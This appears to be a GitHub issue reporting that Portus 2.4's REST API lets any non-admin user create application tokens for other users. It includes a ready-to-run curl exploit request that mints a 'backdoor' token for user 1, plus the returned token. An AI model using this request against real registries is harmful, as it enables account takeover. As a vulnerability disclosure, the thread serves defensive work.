Users can create application tokens for any user via the REST API
claudiocabral opened this issue · comments
Claudio Cabral commented
Description
It seems to me that any user can add application tokens to other users via the REST API.
Steps to reproduce
- Create a new user (can be a bot) without admin privileges, teams or namespaces
- Do a post request to create a new token for an arbitrary user
curl -X POST --header 'Accept: application/json' --header 'Content-Type: application/json' --header 'Portus-Auth: sneakyuser:app_token' --data '{"application":"backdoor"}' 'https://portus.mydomain.com/api/v1/users/1/application_tokens'
- Get an application token for user 1
{"id":10,"application":"backdoor","plain_token":"a_valid_portus_token"}
- Expected behavior: Users cannot create tokens for other users
- Actual behavior: Users can create tokens for other users
Portus version: opensuse/portus:2.4
stale commented
Thanks for all your contributions!
This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs.
Sisir commented
This is a serious security issue any update on this?
Lukas Bachschwell commented
?